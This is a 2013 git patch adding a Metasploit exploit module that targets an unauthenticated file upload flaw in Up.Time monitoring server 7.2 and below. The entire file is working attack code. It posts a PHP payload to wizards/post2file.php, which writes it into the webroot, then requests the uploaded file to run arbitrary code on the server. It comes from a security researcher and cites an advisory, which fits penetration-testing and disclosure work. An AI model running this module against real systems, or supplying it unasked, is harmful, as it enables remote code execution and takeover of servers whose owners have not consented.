From cfffd80d22866222232d217f2ef4e1b7c804a979 Mon Sep 17 00:00:00 2001
From: DoI <denis.andzakovic@security-assessment.com>
Date: Thu, 5 Dec 2013 11:56:05 +1300
Subject: [PATCH] Added uptime_file_upload exploit module

---
 .../exploits/linux/http/uptime_file_upload.rb | 96 +++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 modules/exploits/linux/http/uptime_file_upload.rb

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
new file mode 100644
index 0000000000..44306f0f26
--- /dev/null
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -0,0 +1,96 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Up.Time Monitoring post2file.php Arbitrary File Upload',
+      'Description'    => %q{
+          This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server
+          7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading
+          to arbitrary code execution.
+      },
+      'Author'         =>
+        [
+          'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf']
+        ],
+      'Payload'            =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Platform'       => 'php',
+      'Arch'         => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Up.Time 7.2', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 19 2013'))
+
+    register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class)
+  end
+
+  def check
+    uri =  target_uri.path
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
+    })
+
+    if not res or res.code != 200
+      return Exploit::CheckCode::Unknown
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    print_status("#{peer} - Uploading PHP to Up.Time server")
+    uri =  target_uri.path
+
+    peer = "#{rhost}:#{rport}"
+    @payload_name = "#{rand_text_alpha(5)}.php"
+    php_payload = get_write_exec_payload(:unlink_self=>true)
+
+    data = Rex::MIME::Message.new
+    post_data = "file_name=#{@payload_name}&script=#{php_payload}"
+
+
+    print_status("#{peer} - Uploading payload #{@payload_name}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
+      'data'   => post_data,
+      'headers'  => {
+        'Content-Type' => 'application/x-www-form-urlencoded'
+      }
+    })
+    if not res or res.code != 200
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    print_status("#{peer} - Executing payload #{@payload_name}")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'wizards', @payload_name),
+      'method' => 'GET'
+    })
+  end
+end